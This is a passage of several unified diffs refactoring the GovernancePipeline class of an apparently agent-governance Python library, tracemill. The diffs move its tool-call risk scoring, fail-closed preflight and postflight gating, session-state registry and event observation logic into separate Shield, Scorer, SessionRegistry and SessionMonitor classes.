-            effect=trace.effect or "read_only",
-            capabilities=trace.capability,
-            scope=trace.scope,
-            role=trace.role,
-            action=trace.action,
-            risk_score=trace.risk_score or 0,
-            risk_band=trace.risk_band or "unknown",
-            suggested_action=trace.suggested_action or "allow",
-            reason=trace.reason or "",
-            session_id=trace.session_id,
-            tool_call_id=trace.tool_call_id,
-            event_trace=trace,
-        )
-
-    def _to_tool_call_result(
-        self,
-        trace: "EventTrace",
-        *,
-        output: dict | None = None,
-        duration_ms: int | None = None,
-        error: str | None = None,
-    ) -> "ToolCallResult":
-        """Convert a fully-assessed EventTrace + output into a gate-facing ToolCallResult."""
-        from tracemill.sdk.gate_types import ToolCallResult
-        from tracemill.trace import _deep_freeze, EMPTY_MAP
-
-        return ToolCallResult(
-            tool=trace.canonical_tool or trace.tool_name or "unknown",
-            input=trace.tool_input,
-            target=trace.target_resource,
-            output=_deep_freeze(output) if output else EMPTY_MAP,
-            duration_ms=duration_ms,
-            error=error,
-            mechanism=trace.mechanism or "unknown",
-            effect=trace.effect or "read_only",
-            capabilities=trace.capability,
-            risk_score=trace.risk_score or 0,
-            risk_band=trace.risk_band or "unknown",
-            suggested_action=trace.suggested_action or "allow",
-            reason=trace.reason or "",
-            session_id=trace.session_id,
-            tool_call_id=trace.tool_call_id,
-            event_trace=trace,
-        )
-
     def _run_preflight(self, trace: "EventTrace", *, session_id: str) -> "Verdict":
-        """Execute the preflight gate chain. Returns first DENY or ALLOW.
-
-        All gates come from the GatePolicy. No per-method overrides.
-        Fail-closed: if any gate or internal logic raises, returns DENY.
-        """
-        from tracemill.sdk.verdict import Verdict
-
-        try:
-            request = self._to_tool_call_request(trace)
-            ctx = self._build_gate_context(session_id)
-        except Exception as exc:
-            deny = Verdict.deny(f"gate setup error (fail-closed): {type(exc).__name__}: {exc}")
-            self._record_denial(session_id, deny)
-            return deny
-
-        # Run policy chain
-        if self.policy and self.policy.has_preflight:
-            for gate in self.policy.preflight_gates:
-                try:
-                    verdict = gate(request, ctx)
-                except Exception as exc:
-                    # Fail-closed: gate exception = DENY
-                    deny = Verdict.deny(f"gate error (fail-closed): {type(exc).__name__}: {exc}")
-                    self._record_denial(session_id, deny)
-                    return deny
-                if verdict.denied:
-                    self._record_denial(session_id, verdict)
-                    return verdict
-
-        self._record_allow(session_id, tool_call_id=trace.tool_call_id)
-        return Verdict.allow()
+        """Forward to the Shield's preflight enforcement chain."""
+        return self._shield.run_preflight(trace, session_id=session_id)
 
     def _run_postflight(
         self,
@@ -655,64 +546,14 @@ class GovernancePipeline:
         duration_ms: int | None = None,
         error: str | None = None,
     ) -> "PostflightVerdict":
-        """Execute the postflight gate chain. Returns most restrictive action.
-
-        Priority: TERMINATE > SUPPRESS > REDACT > ALERT > ACCEPT.
-        Fail-closed: if any gate or setup raises, returns SUPPRESS.
-        """
-        from tracemill.sdk.gate_types import PostflightAction, PostflightVerdict
-
-        try:
-            result = self._to_tool_call_result(
-                trace, output=output, duration_ms=duration_ms, error=error
-            )
-            ctx = self._build_gate_context(session_id)
-        except Exception as exc:
-            return PostflightVerdict(
-                action=PostflightAction.SUPPRESS,
-                reason=f"postflight setup error (fail-closed): {type(exc).__name__}: {exc}",
-            )
-
-        # Action severity ordering
-        _SEVERITY = {
-            PostflightAction.ACCEPT: 0,
-            PostflightAction.ALERT: 1,
-            PostflightAction.REDACT: 2,
-            PostflightAction.SUPPRESS: 3,
-            PostflightAction.TERMINATE: 4,
-        }
-
-        most_severe = PostflightVerdict()
-
-        # Run policy chain
-        if self.policy and self.policy.has_postflight:
-            for gate in self.policy.postflight_gates:
-                try:
-                    pv = gate(result, ctx)
-                except Exception as exc:
-                    # Fail-closed: gate exception = SUPPRESS (not TERMINATE to avoid crashing)
-                    pv = PostflightVerdict(
-                        action=PostflightAction.SUPPRESS,
-                        reason=f"postflight gate error (fail-closed): {type(exc).__name__}: {exc}",
-                    )
-                if _SEVERITY.get(pv.action, 0) > _SEVERITY.get(most_severe.action, 0):
-                    most_severe = pv
-
-        return most_severe
-
-    def _record_denial(self, session_id: str, verdict: "Verdict") -> None:
-        """Record a shield denial. Does not touch the tool-call counter."""
-        self._ensure_gate_state(session_id).record_denial(verdict)
-
-    def _record_allow(self, session_id: str, *, tool_call_id: str | None = None) -> None:
-        """Record a shield allow. The tool-call counter is NOT advanced here —
-        it advances only when the allowed call is observed at completion
-        (see _observe_completed_call). The shield only reads the counter."""
-        self._ensure_gate_state(session_id).record_allow(tool_call_id=tool_call_id)
-
-    def _ensure_gate_state(self, session_id: str):
-        """Return session state for gate context tracking (thread-safe, ephemeral)."""
-        return self._registry.ensure(session_id)
+        """Forward to the Shield's postflight enforcement chain."""
+        return self._shield.run_postflight(
+            trace,
+            session_id=session_id,
+            output=output,
+            duration_ms=duration_ms,
+            error=error,
+        )
 
     def score_tool_call_event(self, event: "tracemill.types.SessionEvent") -> "SessionMeta":
         """Score an enriched SessionEvent via the canonical bridge.
@@ -1622,17 +1463,8 @@ class GovernancePipeline:
     # Postflight verdicts (SUPPRESS/TERMINATE/REDACT) are enforced via framework-native signals.
 
     def _score_and_gate_preflight(self, payload: dict) -> tuple:
-        """Score a tool call and run the preflight gate chain. Thread-safe.
-
-        Returns (trace, verdict) tuple. Verdict is ALLOW or DENY.
-        Session ID is derived from the trace (which normalizes from payload).
-        """
-        with self._gate_lock:
-            trace = self._score_event(payload)
-        # Use trace.session_id for consistency — it normalizes empty/missing values
-        session_id = trace.session_id
-        verdict = self._run_preflight(trace, session_id=session_id)
-        return trace, verdict
+        """Forward to the Shield: score a tool call and run the preflight chain."""
+        return self._shield.score_and_gate_preflight(payload)
 
     def _enforce_postflight(
         self,
@@ -1643,19 +1475,8 @@ class GovernancePipeline:
         duration_ms: int | None = None,
         error: str | None = None,
     ) -> "PostflightVerdict":
-        """Observe the completed call, then run the postflight chain.
-
-        This is the post-execution point: the call the shield allowed has now
-        run, so the trace observes it here — the single place the tool-call
-        counter advances in the gate channel. Then callers check verdict.action:
-          - ACCEPT: return result normally
-          - REDACT: strip keys from output before returning
-          - SUPPRESS: return empty/neutral output to the model
-          - TERMINATE: raise/signal session termination
-          - ALERT: return result normally but log alert
-        """
-        self._observe_completed_call(trace, session_id=session_id)
-        return self._run_postflight(
+        """Forward to the Shield: observe the completed call, then run postflight."""
+        return self._shield.enforce_postflight(
             trace,
             session_id=session_id,
             output=output,
@@ -1663,44 +1484,10 @@ class GovernancePipeline:
             error=error,
         )
 
-    def _observe_completed_call(self, trace: "EventTrace", *, session_id: str) -> None:
-        """Advance the single tool-call counter for a shield-allowed call that
-        has now executed. The trace only ever observes what the gate allowed, so
-        this is the one writer of the counter in the gate channel."""
-        state = self._ensure_gate_state(session_id)
-        phase_window = state.snapshot().phase_window
-        state.increment_budget(
-            mechanism=trace.mechanism,
-            effect=trace.effect,
-            scope=frozenset(trace.scope),
-            role=frozenset(trace.role),
-            action=frozenset(trace.action),
-            capability=frozenset(trace.capability),
-            structure=frozenset(trace.structure),
-            phase=phase_window[-1] if phase_window else None,
-        )
-
     @staticmethod
     def _apply_postflight_to_output(pv: "PostflightVerdict", result: str) -> str:
-        """Apply a postflight verdict to a string result.
-
-        Returns the (possibly redacted/suppressed) output string.
-        Raises RuntimeError on TERMINATE.
-        """
-        from tracemill.sdk.gate_types import PostflightAction
-
-        if pv.action == PostflightAction.ACCEPT or pv.action == PostflightAction.ALERT:
-            return result
-        if pv.action == PostflightAction.SUPPRESS:
-            return "[output suppressed by policy]"
-        if pv.action == PostflightAction.REDACT:
-            redacted = result
-            for key in pv.redaction_keys:
-                redacted = redacted.replace(key, "[REDACTED]")
-            return redacted
-        if pv.action == PostflightAction.TERMINATE:
-            raise RuntimeError(f"Session terminated by policy: {pv.reason}")
-        return result
+        """Forward to the Shield's postflight-output transform."""
+        return Shield.apply_postflight_to_output(pv, result)
 
     def gate_crewai(self) -> None:
         """Register tracemill into CrewAI's before/after tool_call hooks.

--- a/src/tracemill/governance/pipeline.py
+++ b/src/tracemill/governance/pipeline.py
@@ -4,7 +4,6 @@ from __future__ import annotations
 
 import json
 import sqlite3
-import uuid
 from datetime import datetime, timezone
 from typing import TYPE_CHECKING
 
@@ -13,12 +12,9 @@ from tracemill.governance.codec import MetaCodec
 from tracemill.governance.context import ContextBuilder
 from tracemill.governance.phase1 import Phase1
 from tracemill.governance.registry import SessionRegistry
+from tracemill.governance.scorer import Scorer
 from tracemill.governance.shield import Shield
-from tracemill.governance.results import (
-    RecommendedAction,
-    RiskRecommendation,
-    SessionMeta,
-)
+from tracemill.governance.results import SessionMeta
 
 if TYPE_CHECKING:
     import tracemill.types
@@ -72,9 +68,17 @@ class GovernancePipeline:
         self._registry = SessionRegistry(store)
         self._assessor = DefaultAssessor(labeler, rules, engine)
         self._phase1 = Phase1(budget_tracker, labeler)
-        self._shield = Shield(self._registry, lambda: self.policy, self._score_event)
         self._codec = MetaCodec()
         self._context = ContextBuilder(engine, project_root)
+        self._scorer = Scorer(
+            self._context,
+            self._phase1,
+            self._assessor,
+            self._registry,
+            store,
+            self._codec,
+        )
+        self._shield = Shield(self._registry, lambda: self.policy, self._scorer.score_event)
         self._write_failures: dict[str, int] = {}  # session_id → consecutive failure count
         self._MAX_WRITE_FAILURES = 10
         self._phase23_attempts: dict[str, int] = {}  # source_event_key → attempt count
@@ -215,93 +219,8 @@ class GovernancePipeline:
         return self._context.from_tool_call(event)
 
     def score_tool_call(self, payload: dict) -> "EventTrace":
-        """Score a pending tool call against current session state.
-
-        Pure scoring — returns a fully-enriched EventTrace. Does NOT fire any callbacks.
-        Downstream apps decide what to do with the result.
-
-        Args:
-            payload: Dict with at minimum:
-                - ``tool_name``: str
-                - ``tool_input``: dict
-                - ``session_id``: str
-              Optional:
-                - ``server_namespace``: str
-                - ``project_root``: str
-
-        Returns:
-            EventTrace — the unified pipeline type with classification + assessment.
-        """
-        return self._score_event(payload)
-
-    def _score_event(self, payload: dict) -> "EventTrace":
-        """Internal: build event from dict, score it, return EventTrace."""
-        from tracemill.governance.types import ToolCallEvent
-
-        event = ToolCallEvent.from_dict(payload)
-        try:
-            ctx = self.enrich_event(event)
-        except Exception as exc:
-            meta = self._fail_closed(exc)
-            return self._meta_to_trace(payload, event, meta, kind="tool.call.started")
-
-        try:
-            meta = self.preflight_event(ctx)
-        except Exception as exc:
-            meta = self._fail_closed(exc, classification=ctx.base_classification)
-            return self._meta_to_trace(payload, event, meta, kind="tool.call.started")
-
-        self._persist_score(event.source_event_key, event.session_id, meta)
-        return self._meta_to_trace(payload, event, meta, kind="tool.call.started")
-
-    def _meta_to_trace(
-        self,
-        payload: dict,
-        event: "ToolCallEvent",
-        meta: "SessionMeta",
-        *,
-        kind: str = "tool.call.started",
-    ) -> "EventTrace":
-        """Convert internal pipeline types into a unified EventTrace."""
-
-        from tracemill.trace import EventTrace
-
-        cls = meta.classification
-        risk = meta.risk_assessment
-        rec = meta.recommendation
-        raw = payload if isinstance(payload, dict) else {}
-
-        return EventTrace(
-            id=event.event_id,
-            kind=kind,
-            session_id=event.session_id,
-            tool_call_id=raw.get("tool_call_id") or str(uuid.uuid4()),
-            timestamp=event.timestamp,
-            source_key=event.source_event_key,
-            raw_event=raw,
-            parent_tool_call_id=raw.get("parent_tool_call_id"),
-            # Tool identity (gen_ai.tool.* aligned)
-            tool_name=raw.get("tool_name"),
-            tool_input=raw.get("tool_input") or {},
-            tool_result=raw.get("tool_result") or raw.get("result"),
-            target_resource=raw.get("target_resource"),
-            # Classification
-            mechanism=cls.mechanism if cls else None,
-            effect=cls.effect if cls else None,
-            scope=tuple(cls.scope) if cls else (),
-            role=tuple(cls.role) if cls else (),
-            action=tuple(cls.action) if cls else (),
-            capability=tuple(cls.capability) if cls else (),
-            structure=tuple(cls.structure) if cls else (),
-            canonical_tool=raw.get("tool_name"),
-            # Assessment
-            risk_score=risk.score if risk else None,
-            risk_band=risk.level if risk else None,
-            suggested_action=rec.recommended_action.value if rec else None,
-            reason=rec.reason_code if rec else None,
-            # Stage
-            stage="assessed" if risk else ("classified" if cls else "adapted"),
-        )
+        """Score a pending tool call against current session state (delegates to Scorer)."""
+        return self._scorer.score_tool_call(payload)
 
     # ─── Central gate execution helpers ───────────────────────────────────────
 
@@ -328,26 +247,8 @@ class GovernancePipeline:
         )
 
     def score_tool_call_event(self, event: "tracemill.types.SessionEvent") -> "SessionMeta":
-        """Score an enriched SessionEvent via the canonical bridge.
-
-        Same as score_tool_call but accepts a SessionEvent (from adapters/Enricher)
-        instead of a raw dict.
-
-        Returns:
-            SessionMeta — same shape sinks receive in the observation pipeline.
-        """
-        try:
-            ctx = self.context_from_session_event(event)
-        except Exception as exc:
-            return self._fail_closed(exc)
-
-        try:
-            meta = self.preflight_event(ctx)
-        except Exception as exc:
-            return self._fail_closed(exc, classification=ctx.base_classification)
-
-        self._persist_score(ctx.event.source_event_key, ctx.event.session_id, meta)
-        return meta
+        """Score an enriched SessionEvent via the canonical bridge (delegates to Scorer)."""
+        return self._scorer.score_tool_call_event(event)
 
     def observe_event(self, event: "tracemill.types.SessionEvent") -> "SessionMeta | None":
         """Observation-path scoring for use as a live pipeline stage.
@@ -400,87 +301,9 @@ class GovernancePipeline:
             return self.process_event(self.context_from_session_event(event))
         return None
 
-    def _persist_score(self, source_event_key: str, session_id: str, meta: "SessionMeta") -> None:
-        """Persist a scoring result to the audit trail.
-
-        Uses a distinct source_event_key (score:{id}) that never collides with
-        observation events. If the same tool call later executes and arrives via
-        the standard pipeline, both records coexist — enabling correlation of
-        'what we recommended' vs 'what actually happened'.
-        """
-        try:
-            meta_dict = self._codec.serialize_meta(meta)
-            meta_dict["scored"] = True
-            meta_json = json.dumps(meta_dict)
-            now = datetime.now(timezone.utc).isoformat()
-            self._store.execute_in_transaction(
-                "INSERT OR IGNORE INTO processed_events (source_event_key, session_id, session_meta_json, processed_at) VALUES (?, ?, ?, ?)",
-                (source_event_key, session_id, meta_json, now),
-            )
-            self._store.commit()
-            self._store.cache_processed(source_event_key, meta_json)
-        except Exception:
-            # Best-effort persistence — scoring result was already returned to caller.
-            # If this fails, the score is still usable but won't be in the audit trail.
-            try:
-                self._store.rollback()
-            except Exception:
-                pass
-
-    def _fail_closed(self, exc: Exception, classification=None) -> "SessionMeta":
-        """Produce a SessionMeta that signals ESCALATE due to internal error."""
-        from tracemill.classify.risk import RiskAssessment
-
-        reason = f"internal_error: {type(exc).__name__}"
-        risk = RiskAssessment(
-            score=0,
-            level="unknown",
-            confidence="low",
-            factors=(reason,),
-            mitre=(),
-            version="1",
-        )
-        recommendation = RiskRecommendation(
-            recommended_action=RecommendedAction.ESCALATE,
-            assessment=risk,
-            reason_code=reason,
-            canonical_id="error",
-        )
-        return SessionMeta(
-            classification=classification,
-            risk_assessment=risk,
-            recommendation=recommendation,
-        )
-
     def preflight_event(self, ctx: "EnrichmentContext") -> "SessionMeta":
-        """Simulate full pipeline (Phase 1/2/3) without persisting state changes.
-
-        Creates a transient copy of session state, applies Phase 1 mutations
-        (budget, taint, drift) to it, then runs Phase 2/3 against the result.
-        The real state and DB are never modified.
-
-        Used by .score_tool_call() to predict what the pipeline would produce if the
-        event actually executed, without committing any side effects.
-        """
-        from tracemill.governance.state import SessionState
-
-        session_id = ctx.event.session_id
-
-        # Use cached state if available; otherwise start fresh (thread-safe,
-        # avoids cross-thread sqlite3 access for unknown sessions)
-        state = self._registry.get(session_id)
-        if state is None:
-            state = SessionState(session_id=session_id)
-
-        # Thread-safe clone — never touches state._db
-        transient = state.clone_detached()
-
-        # ── Phase 1 simulation (non-persisted) ──
-        self._phase1.apply(ctx, transient)
-
-        # ── Phase 2/3 (side-effect-free) ──
-        snapshot = transient.snapshot()
-        return self._assessor.assess(ctx, snapshot).meta
+        """Preview Phase 1/2/3 without persisting state (delegates to Scorer)."""
+        return self._scorer.preflight_event(ctx)
 
     def get_or_create_state(self, session_id: str) -> "SessionState":
         """Get or create session state, rehydrating from the store on a miss."""

--- a/src/tracemill/governance/pipeline.py
+++ b/src/tracemill/governance/pipeline.py
@@ -8,6 +8,7 @@ import uuid
 from datetime import datetime, timezone
 from typing import TYPE_CHECKING, Literal
 
+from tracemill.governance.registry import SessionRegistry
 from tracemill.governance.results import (
     Evidence,
     EvidencePointer,
@@ -92,7 +93,7 @@ class GovernancePipeline:
         self._project_root = project_root
         self.policy: "GatePolicy | None" = policy
         self._gate_lock = threading.Lock()
-        self._states: dict[str, "SessionState"] = {}
+        self._registry = SessionRegistry(store)
         self._write_failures: dict[str, int] = {}  # session_id → consecutive failure count
         self._MAX_WRITE_FAILURES = 10
         self._phase23_attempts: dict[str, int] = {}  # source_event_key → attempt count
@@ -546,7 +547,7 @@ class GovernancePipeline:
         """
         from tracemill.sdk.gate_types import GateContext
 
-        state = self._states.get(session_id)
+        state = self._registry.get(session_id)
         if state is None:
             return GateContext(session_id=session_id, tool_call_count=0, denied_count=0)
 
@@ -710,16 +711,8 @@ class GovernancePipeline:
         self._ensure_gate_state(session_id).record_allow(tool_call_id=tool_call_id)
 
     def _ensure_gate_state(self, session_id: str):
-        """Lazily create minimal session state for gate context tracking.
-
-        Uses setdefault for thread-safety (CPython dict operations are atomic
-        under the GIL for single-bytecode-instruction calls).
-        """
-        if session_id not in self._states:
-            from tracemill.governance.state import SessionState
-
-            self._states.setdefault(session_id, SessionState(session_id=session_id))
-        return self._states[session_id]
+        """Return session state for gate context tracking (thread-safe, ephemeral)."""
+        return self._registry.ensure(session_id)
 
     def score_tool_call_event(self, event: "tracemill.types.SessionEvent") -> "SessionMeta":
         """Score an enriched SessionEvent via the canonical bridge.
@@ -862,9 +855,8 @@ class GovernancePipeline:
 
         # Use cached state if available; otherwise start fresh (thread-safe,
         # avoids cross-thread sqlite3 access for unknown sessions)
-        if session_id in self._states:
-            state = self._states[session_id]
-        else:
+        state = self._registry.get(session_id)
+        if state is None:
             state = SessionState(session_id=session_id)
 
         # Thread-safe clone — never touches state._db
@@ -905,13 +897,8 @@ class GovernancePipeline:
         )
 
     def get_or_create_state(self, session_id: str) -> "SessionState":
-        """Get or create session state."""
-        from tracemill.governance.state import SessionState
-
-        if session_id not in self._states:
-            state = SessionState.load_from_db(session_id, self._store.connection)
-            self._states[session_id] = state
-        return self._states[session_id]
+        """Get or create session state, rehydrating from the store on a miss."""
+        return self._registry.get_or_create(session_id)
 
     def process_lifecycle(self, session_id: str, event_kind: str) -> SessionMeta:
         """Handle session_start/end — Phase 1 only, skip Phase 2/3."""
@@ -926,7 +913,7 @@ class GovernancePipeline:
             snapshot = state.snapshot()
             self._write_session_summary(session_id, snapshot)
             # Evict session state to prevent unbounded memory growth
-            self._states.pop(session_id, None)
+            self._registry.evict(session_id)
             self._write_failures.pop(session_id, None)
             # Clean up any lingering phase23 attempts for this session's events
             for key in self._phase23_session_keys.pop(session_id, set()):
@@ -989,7 +976,7 @@ class GovernancePipeline:
                     phase1_exc,
                 )
                 # Discard corrupted in-memory state — reload clean from DB
-                del self._states[session_id]
+                self._registry.evict(session_id)
                 state = self.get_or_create_state(session_id)
                 return SessionMeta(
                     classification=None,
@@ -1029,7 +1016,7 @@ class GovernancePipeline:
                 )
                 self._store.rollback()
                 # Discard corrupted in-memory state — reload clean from DB
-                del self._states[session_id]
+                self._registry.evict(session_id)
                 state = self.get_or_create_state(session_id)
                 # Return degraded response — event will be re-delivered
                 return SessionMeta(

--- a/src/tracemill/governance/pipeline.py
+++ b/src/tracemill/governance/pipeline.py
@@ -2,14 +2,12 @@
 
 from __future__ import annotations
 
-import json
-import sqlite3
-from datetime import datetime, timezone
 from typing import TYPE_CHECKING
 
 from tracemill.governance.assessor import DefaultAssessor
 from tracemill.governance.codec import MetaCodec
 from tracemill.governance.context import ContextBuilder
+from tracemill.governance.monitor import SessionMonitor
 from tracemill.governance.phase1 import Phase1
 from tracemill.governance.registry import SessionRegistry
 from tracemill.governance.scorer import Scorer
@@ -24,7 +22,7 @@ if TYPE_CHECKING:
     from tracemill.governance.labeler import GovernanceLabeler
     from tracemill.governance.persistence import SystemStore
     from tracemill.governance.rules import Rule
-    from tracemill.governance.state import SessionState, SessionStateSnapshot
+    from tracemill.governance.state import SessionState
     from tracemill.governance.types import (
         EnrichmentContext,
         ToolCallEvent,
@@ -79,13 +77,14 @@ class GovernancePipeline:
             self._codec,
         )
         self._shield = Shield(self._registry, lambda: self.policy, self._scorer.score_event)
-        self._write_failures: dict[str, int] = {}  # session_id → consecutive failure count
-        self._MAX_WRITE_FAILURES = 10
-        self._phase23_attempts: dict[str, int] = {}  # source_event_key → attempt count
-        self._phase23_session_keys: dict[
-            str, set[str]
-        ] = {}  # session_id → set of event keys with attempts
-        self._MAX_PHASE23_ATTEMPTS = 3
+        self._monitor = SessionMonitor(
+            self._context,
+            self._phase1,
+            self._assessor,
+            self._registry,
+            store,
+            self._codec,
+        )
 
     @classmethod
     def create(
@@ -251,397 +250,24 @@ class GovernancePipeline:
         return self._scorer.score_tool_call_event(event)
 
     def observe_event(self, event: "tracemill.types.SessionEvent") -> "SessionMeta | None":
-        """Observation-path scoring for use as a live pipeline stage.
-
-        Unlike :meth:`score_tool_call_event` (read-only preflight), this runs the
-        state-mutating observation path and returns the ``SessionMeta`` to stamp
-        onto the event's ``metadata.governance`` — or ``None`` when the event is
-        not governance-relevant.
-
-        This is the method :class:`~tracemill.pipeline.EventPipeline` calls when a
-        governance stage is wired in, making governance one stage of the pipeline
-        rather than a separate track. Because the stage sees *every* event kind at
-        the sink choke point, it must dispatch by kind:
-
-        * Session lifecycle (``session.started`` / ``session.ended``) →
-          :meth:`process_lifecycle` (Phase 1 only; ``session.ended`` also
-          finalizes the summary and evicts session state).
-        * Tool calls → the state-mutating :meth:`process_event`. Every
-          ``tool.call.completed`` is scored; a ``tool.call.started`` is scored
-          only when it is an id-bearing orphan (an unpaired start flushed at
-          session end / pipeline close, or a displaced duplicate), since the
-          Enricher buffers a paired start into its completion and emits a no-id
-          start's completion separately. This keeps each real tool call observed
-          exactly once.
-        * Any other kind (messages, turns, llm/planning chunks, spans, usage, …)
-          is *not* a tool call and must not advance the tool-call budget, so it is
-          left ungoverned (``None`` → no ``metadata.governance`` stamp).
-        """
-        from tracemill.types import EventKind
-
-        kind = event.kind
-        if kind == EventKind.SESSION_STARTED:
-            return self.process_lifecycle(event.session_id, "session_start")
-        if kind == EventKind.SESSION_ENDED:
-            return self.process_lifecycle(event.session_id, "session_end")
-        if kind == EventKind.TOOL_CALL_COMPLETED:
-            return self.process_event(self.context_from_session_event(event))
-        if kind == EventKind.TOOL_CALL_STARTED:
-            # A started event only reaches the stage (rather than being buffered)
-            # as either a genuine orphan — an unpaired start flushed at session
-            # end / pipeline close, or a displaced duplicate, all of which carry a
-            # tool_call_id and MUST be scored since no completion will — or a no-id
-            # "provisional" start the Enricher cannot pair, whose completion is
-            # emitted and scored separately. Scoring the latter would double-count,
-            # so discriminate on the same id the Enricher pairs on.
-            from tracemill.enricher import _extract_tool_call_id
-
-            if _extract_tool_call_id(event) is None:
-                return None
-            return self.process_event(self.context_from_session_event(event))
-        return None
+        """Observation-path scoring stage — the single writer (delegates to SessionMonitor)."""
+        return self._monitor.observe_event(event)
 
     def preflight_event(self, ctx: "EnrichmentContext") -> "SessionMeta":
         """Preview Phase 1/2/3 without persisting state (delegates to Scorer)."""
         return self._scorer.preflight_event(ctx)
 
     def get_or_create_state(self, session_id: str) -> "SessionState":
-        """Get or create session state, rehydrating from the store on a miss."""
-        return self._registry.get_or_create(session_id)
+        """Get or create session state, rehydrating on a miss (delegates to SessionMonitor)."""
+        return self._monitor.get_or_create_state(session_id)
 
     def process_lifecycle(self, session_id: str, event_kind: str) -> SessionMeta:
-        """Handle session_start/end — Phase 1 only, skip Phase 2/3."""
-
-        state = self.get_or_create_state(session_id)
-
-        if event_kind == "session_start":
-            # Initialize state (idempotent — load_from_db handles fresh sessions)
-            pass
-        elif event_kind == "session_end":
-            # Finalize: write session summary
-            snapshot = state.snapshot()
-            self._write_session_summary(session_id, snapshot)
-            # Evict session state to prevent unbounded memory growth
-            self._registry.evict(session_id)
-            self._write_failures.pop(session_id, None)
-            # Clean up any lingering phase23 attempts for this session's events
-            for key in self._phase23_session_keys.pop(session_id, set()):
-                self._phase23_attempts.pop(key, None)
-
-        snapshot = state.snapshot()
-        return SessionMeta(
-            classification=None,
-            risk_assessment=None,
-            recommendation=None,
-            budget_snapshot=snapshot.budget,
-            drift=None,
-            mcp_alerts=(),
-            evidence=None,
-        )
+        """Handle session_start/end — Phase 1 only (delegates to SessionMonitor)."""
+        return self._monitor.process_lifecycle(session_id, event_kind)
 
     def process_event(self, ctx: "EnrichmentContext") -> SessionMeta:
-        """Full pipeline: Phase 1 → Phase 2 → Phase 3 → SessionMeta."""
-
-        event = ctx.event
-        session_id = event.session_id
-
-        # ── Phase 1: State Mutation ──
-        # Idempotency check BEFORE loading state (prevents resurrection of ended sessions)
-        existing = self._store.is_duplicate(event.source_event_key)
-        if existing:
-            meta_dict = json.loads(existing)
-            if not meta_dict.get("reserved"):
-                return self._codec.deserialize_meta(meta_dict)
-            # Reserved = Phase 1 completed atomically. Skip Phase 1, re-run Phase 2/3 only.
-            # Restore attempt count from persisted reservation (survives restarts)
-            persisted_attempts = meta_dict.get("phase23_attempts", 0)
-            if event.source_event_key not in self._phase23_attempts:
-                self._phase23_attempts[event.source_event_key] = persisted_attempts
-
-        state = self.get_or_create_state(session_id)
-
-        if not existing:
-            # Phase 1 mutations (in-memory) — wrapped for crash recovery
-            try:
-                self._phase1.apply(ctx, state)
-            except Exception as phase1_exc:
-                import logging
-
-                logging.getLogger(__name__).error(
-                    "Phase 1 mutation failed for session %s event %s: %s — discarding state",
-                    session_id,
-                    event.source_event_key,
-                    phase1_exc,
-                )
-                # Discard corrupted in-memory state — reload clean from DB
-                self._registry.evict(session_id)
-                state = self.get_or_create_state(session_id)
-                return SessionMeta(
-                    classification=None,
-                    risk_assessment=None,
-                    recommendation=None,
-                    budget_snapshot=state.snapshot().budget,
-                    drift=None,
-                    mcp_alerts=(),
-                    evidence=None,
-                )
-
-            # Atomic commit: state persist + reservation in single transaction
-            # Include Phase-1 snapshot in reservation so retries use event-time state
-            now = datetime.now(timezone.utc).isoformat()
-            snapshot_for_reservation = state.snapshot()
-            reservation_data = {
-                "reserved": True,
-                "snapshot": self._codec.serialize_snapshot(snapshot_for_reservation),
-            }
-            reservation_json = json.dumps(reservation_data)
-            try:
-                state.persist_no_commit()
-                self._store.execute_in_transaction(
-                    "INSERT OR IGNORE INTO processed_events (source_event_key, session_id, session_meta_json, processed_at) VALUES (?, ?, ?, ?)",
-                    (event.source_event_key, session_id, reservation_json, now),
-                )
-                self._store.commit()
-                self._write_failures[session_id] = 0
-                self._store.cache_processed(event.source_event_key, reservation_json)
-            except (sqlite3.OperationalError, sqlite3.IntegrityError) as e:
-                import logging
-
-                logging.getLogger(__name__).warning(
-                    "Atomic Phase 1 commit failed for session %s: %s — discarding in-memory mutations, will retry on next delivery",
-                    session_id,
-                    e,
-                )
-                self._store.rollback()
-                # Discard corrupted in-memory state — reload clean from DB
-                self._registry.evict(session_id)
-                state = self.get_or_create_state(session_id)
-                # Return degraded response — event will be re-delivered
-                return SessionMeta(
-                    classification=None,
-                    risk_assessment=None,
-                    recommendation=None,
-                    budget_snapshot=state.snapshot().budget,
-                    drift=None,
-                    mcp_alerts=(),
-                    evidence=None,
-                )
-
-        # ── Phase 2: Labeling (side-effect-free) ──
-        # Circuit breaker: if Phase 2/3 crashes consistently, dead-letter the event
-        # For retries (existing=reserved), use the persisted event-time snapshot
-        if existing:
-            snapshot_data = meta_dict.get("snapshot")
-            if snapshot_data:
-                snapshot = self._codec.deserialize_snapshot(snapshot_data)
-            else:
-                # Legacy reservation without snapshot — fall back to current state
-                snapshot = state.snapshot()
-        else:
-            snapshot = snapshot_for_reservation
-        try:
-            assessment = self._assessor.assess(ctx, snapshot)
-        except Exception as phase23_exc:
-            import logging
-
-            logger = logging.getLogger(__name__)
-            # Increment attempt counter and dead-letter after max retries
-            attempts = self._phase23_attempts.get(event.source_event_key, 0) + 1
-            self._phase23_attempts[event.source_event_key] = attempts
-            # Track which session owns this key for cleanup on session_end
-            self._phase23_session_keys.setdefault(session_id, set()).add(event.source_event_key)
-            if attempts >= self._MAX_PHASE23_ATTEMPTS:
-                logger.error(
-                    "Event %s failed Phase 2/3 %d times — dead-lettering: %s",
-                    event.source_event_key,
-                    attempts,
-                    phase23_exc,
-                )
-                # Finalize with degraded meta so event stops retrying
-                degraded_meta = SessionMeta(
-                    classification=None,
-                    risk_assessment=None,
-                    recommendation=None,
-                    budget_snapshot=snapshot.budget,
-                    drift=None,
-                    mcp_alerts=(),
-                    evidence=None,
-                )
-                degraded_json = json.dumps(
-                    {
-                        **self._codec.serialize_meta(degraded_meta),
-                        "dead_lettered": True,
-                        "error": str(phase23_exc),
-                        "attempts": attempts,
-                    }
-                )
-                try:
-                    self._store.execute_in_transaction(
-                        "UPDATE processed_events SET session_meta_json = ? WHERE source_event_key = ?",
-                        (degraded_json, event.source_event_key),
-                    )
-                    self._store.commit()
-                    self._store.cache_processed(event.source_event_key, degraded_json)
-                    # Only clear attempts after successful dead-letter persistence
-                    del self._phase23_attempts[event.source_event_key]
-                    # Clean session key tracking
-                    dl_keys = self._phase23_session_keys.get(session_id)
-                    if dl_keys:
-                        dl_keys.discard(event.source_event_key)
-                        if not dl_keys:
-                            del self._phase23_session_keys[session_id]
-                except (sqlite3.OperationalError, sqlite3.IntegrityError):
-                    self._store.rollback()
-                    # Keep attempt count — next retry will try dead-lettering again
-                return degraded_meta
-            else:
-                logger.warning(
-                    "Event %s Phase 2/3 attempt %d/%d failed: %s — will retry on next delivery",
